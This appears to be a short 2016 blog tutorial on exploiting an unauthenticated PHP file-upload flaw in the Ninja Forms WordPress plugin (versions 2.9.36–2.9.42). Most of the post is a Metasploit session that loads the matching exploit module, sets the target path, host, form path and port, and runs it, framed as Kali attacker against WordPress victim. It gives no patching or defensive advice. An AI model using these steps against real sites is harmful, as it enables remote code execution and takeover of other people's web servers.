Hacking Wordpress using Ninja Forms Unauthenticated File Upload

at 4:36 AM Monday, June 6, 2016
Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.

Exploit Targets
ninja forms 2.9.36

Requirement
Attacker: kali Linux
Victim PC: wordpress


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit          

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)